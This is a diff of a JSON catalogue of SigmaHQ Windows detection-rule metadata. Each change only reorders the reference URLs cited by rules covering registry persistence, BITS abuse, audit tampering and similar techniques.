- "https://twitter.com/VM_vivisector/status/1217190929330655232",
 "https://twitter.com/FlemmingRiis/status/1217147415482060800",
+ "https://nullsec.us/windows-event-log-audit-cve/",
 "https://www.youtube.com/watch?v=ebmW42YYveI",
+ "https://twitter.com/DidierStevens/status/1217533958096924676",
+ "https://twitter.com/VM_vivisector/status/1217190929330655232",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_audit_cve.yml"
 ],
 "tags": [
@@ -10003,8 +10003,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://docs.microsoft.com/en-us/sql/t-sql/statements/drop-server-audit-transact-sql?view=sql-server-ver16",
- "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16",
 "https://www.netspi.com/blog/technical/network-penetration-testing/sql-server-persistence-part-1-startup-stored-procedures/",
+ "https://docs.microsoft.com/en-us/sql/t-sql/statements/alter-server-audit-transact-sql?view=sql-server-ver16",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/application/win_mssql_disable_audit_settings.yml"
 ],
 "tags": [
@@ -10233,8 +10233,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5",
 "https://twitter.com/moti_b/status/1032645458634653697",
+ "https://www.bsi.bund.de/SharedDocs/Downloads/EN/BSI/Cyber-Security/SiSyPHuS/AP10/Logging_Configuration_Guideline.pdf?__blob=publicationFile&v=5",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/smbclient/win_susp_failed_hidden_share_mount.yml"
 ],
 "tags": [
@@ -10307,10 +10307,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16",
- "https://winaero.com/enable-openssh-server-windows-10/",
- "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse",
 "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH",
+ "https://winaero.com/enable-openssh-server-windows-10/",
+ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16",
+ "https://docs.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse",
 "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml"
 ],
@@ -10335,9 +10335,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
+ "https://twitter.com/fuzzyf10w/status/1410202370835898371",
 "https://github.com/afwu/PrintNightmare",
 "https://github.com/hhlxf/PrintNightmare",
- "https://twitter.com/fuzzyf10w/status/1410202370835898371",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/printservice/win_exploit_cve_2021_1675_printspooler.yml"
 ],
 "tags": [
@@ -10405,8 +10405,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection",
 "https://learn.microsoft.com/en-us/microsoft-365/security/defender-endpoint/troubleshoot-microsoft-defender-antivirus?view=o365-worldwide",
+ "https://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml"
 ],
 "tags": [
@@ -10556,8 +10556,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e",
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/troubleshoot-microsoft-defender-antivirus",
+ "https://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/windefend/win_defender_history_delete.yml"
 ],
 "tags": [
@@ -10719,10 +10719,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
- "https://isc.sans.edu/diary/22264",
 "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin",
+ "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/",
 "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://isc.sans.edu/diary/22264",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_direct_ip_access.yml"
 ],
 "tags": [
@@ -10892,9 +10892,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/malmoeb/status/1535142803075960832",
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md",
 "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md",
+ "https://twitter.com/malmoeb/status/1535142803075960832",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_susp_domain.yml"
 ],
 "tags": [
@@ -10928,8 +10928,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/malmoeb/status/1535142803075960832",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md",
+ "https://twitter.com/malmoeb/status/1535142803075960832",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/bits_client/win_bits_client_uncommon_domain.yml"
 ],
 "tags": [
@@ -10963,8 +10963,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://ngrok.com/",
 "https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg",
+ "https://ngrok.com/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/terminalservices/win_terminalservices_rdp_ngrok.yml"
 ],
 "tags": [
@@ -10998,8 +10998,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83",
- "https://twitter.com/gentilkiwi/status/861641945944391680",
 "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx",
+ "https://twitter.com/gentilkiwi/status/861641945944391680",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_dns_server_susp_dns_config.yml"
 ],
 "tags": [
@@ -11587,8 +11587,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx",
 "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html",
+ "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx",
 "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config.yml"
 ],
@@ -11682,8 +11682,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/Ekultek/BlueKeep",
 "https://github.com/zerosum0x0/CVE-2019-0708",
+ "https://github.com/Ekultek/BlueKeep",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_rdp_potential_cve_2019_0708.yml"
 ],
 "tags": [
@@ -11715,8 +11715,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382",
 "https://www.secura.com/blog/zero-logon",
+ "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml"
 ],
 "tags": [
@@ -12102,8 +12102,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
 "https://twitter.com/deviouspolack/status/832535435960209408",
+ "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_eventlog_cleared.yml"
 ],
 "tags": [
@@ -12330,8 +12330,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
 "https://twitter.com/deviouspolack/status/832535435960209408",
+ "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_eventlog_cleared.yml"
 ],
 "tags": [
@@ -12365,8 +12365,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx",
 "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html",
+ "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx",
 "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/win_system_susp_dhcp_config_failed.yml"
 ],
@@ -13101,8 +13101,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
 "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)",
+ "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server_analytic/win_dns_analytic_apt_gallium.yml"
 ],
 "tags": [
@@ -13244,11 +13244,11 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427",
+ "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1",
 "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs",
+ "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427",
 "https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c",
 "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726",
- "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml"
 ],
 "tags": [
@@ -13290,10 +13290,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
 "Internal Research",
- "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
+ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
 "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_susp_appx_package_installation.yml"
 ],
 "tags": [
@@ -13316,10 +13316,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
 "Internal Research",
- "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
+ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
 "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_susp_package_locations.yml"
 ],
 "tags": [
@@ -13342,9 +13342,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
+ "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
 "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
 "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/",
- "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_mal_appx_names.yml"
 ],
 "tags": [
@@ -13367,10 +13367,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
 "Internal Research",
- "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
+ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
 "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_susp_domains.yml"
 ],
 "tags": [
@@ -13393,10 +13393,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
 "Internal Research",
- "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
+ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
 "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/appxdeployment_server_uncommon_package_locations.yml"
 ],
 "tags": [
@@ -13647,8 +13647,8 @@
 "logsource.category": "create_stream_hash",
 "logsource.product": "windows",
 "refs": [
- "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
 "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
+ "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml"
 ],
 "tags": [
@@ -13959,9 +13959,9 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://adepts.of0x.cc/netsh-portproxy-code/",
 "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html",
 "https://www.dfirnotes.net/portproxy_detection/",
+ "https://adepts.of0x.cc/netsh-portproxy-code/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml"
 ],
 "tags": [
@@ -13996,9 +13996,9 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/",
- "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf",
 "https://persistence-info.github.io/Data/recyclebin.html",
+ "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf",
+ "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml"
 ],
 "tags": [
@@ -14057,8 +14057,8 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md",
+ "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml"
 ],
 "tags": [
@@ -14359,8 +14359,8 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/eset/malware-ioc/tree/master/oceanlotus",
 "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/",
+ "https://github.com/eset/malware-ioc/tree/master/oceanlotus",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml"
 ],
 "tags": [
@@ -14384,8 +14384,8 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly",
 "https://lolbas-project.github.io/lolbas/Binaries/Wsreset",
+ "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml"
 ],
 "tags": [
@@ -14764,10 +14764,10 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/",
 "https://github.com/hfiref0x/UACME",
- "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]",
+ "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/",
 "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass",
+ "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml"
 ],
 "tags": [
@@ -15007,8 +15007,8 @@
 "logsource.category": "registry_delete",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer",
 "http://woshub.com/how-to-clear-rdp-connections-history/",
+ "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml"
 ],
 "tags": [
@@ -15115,11 +15115,11 @@
 "logsource.category": "registry_delete",
 "logsource.product": "windows",
 "refs": [
- "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code",
 "https://docs.microsoft.com/en-us/windows/win32/shell/launch",
- "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html",
 "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand",
+ "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html",
 "https://github.com/OTRF/detection-hackathon-apt29/issues/7",
+ "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml"
 ],
 "tags": [
@@ -15176,8 +15176,8 @@
 "logsource.category": "registry_add",
 "logsource.product": "windows",
 "refs": [
- "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/",
 "https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/",
+ "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_ursnif.yml"
 ],
 "tags": [
@@ -15325,10 +15325,10 @@
 "logsource.category": "registry_add",
 "logsource.product": "windows",
 "refs": [
- "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/",
- "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/",
 "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line",
+ "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/",
 "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/",
+ "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/",
 "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_mal_netwire.yml"
 ],
@@ -15353,8 +15353,8 @@
 "logsource.category": "registry_add",
 "logsource.product": "windows",
 "refs": [
- "https://persistence-info.github.io/Data/amsi.html",
 "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c",
+ "https://persistence-info.github.io/Data/amsi.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml"
 ],
 "tags": [
@@ -15575,8 +15575,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/",
 "https://persistence-info.github.io/Data/htmlhelpauthor.html",
+ "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_chm.yml"
 ],
 "tags": [
@@ -15825,13 +15825,13 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03",
- "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services",
- "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html",
- "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
- "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
 "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/",
+ "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services",
+ "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
 "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html",
+ "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
+ "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03",
+ "https://threathunterplaybook.com/notebooks/windows/05_defense_evasion/WIN-190407183310.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml"
 ],
 "tags": [
@@ -15917,8 +15917,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/",
 "https://persistence-info.github.io/Data/wer_debugger.html",
+ "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml"
 ],
 "tags": [
@@ -16030,8 +16030,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/",
 "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml"
 ],
 "tags": [
@@ -16055,9 +16055,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
 "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/",
 "https://twitter.com/inversecos/status/1494174785621819397",
+ "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_security.yml"
 ],
 "tags": [
@@ -16177,8 +16177,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml"
@@ -16262,8 +16262,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649",
 "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html",
+ "https://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wdigest_enable_uselogoncredential.yml"
 ],
 "tags": [
@@ -16370,9 +16370,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/gtworek/PSBits/tree/master/SIP",
 "https://persistence-info.github.io/Data/codesigning.html",
 "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf",
+ "https://github.com/gtworek/PSBits/tree/master/SIP",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml"
 ],
 "tags": [
@@ -16672,8 +16672,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network",
 "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml"
 ],
 "tags": [
@@ -16741,8 +16741,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html",
 "https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry",
+ "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html",
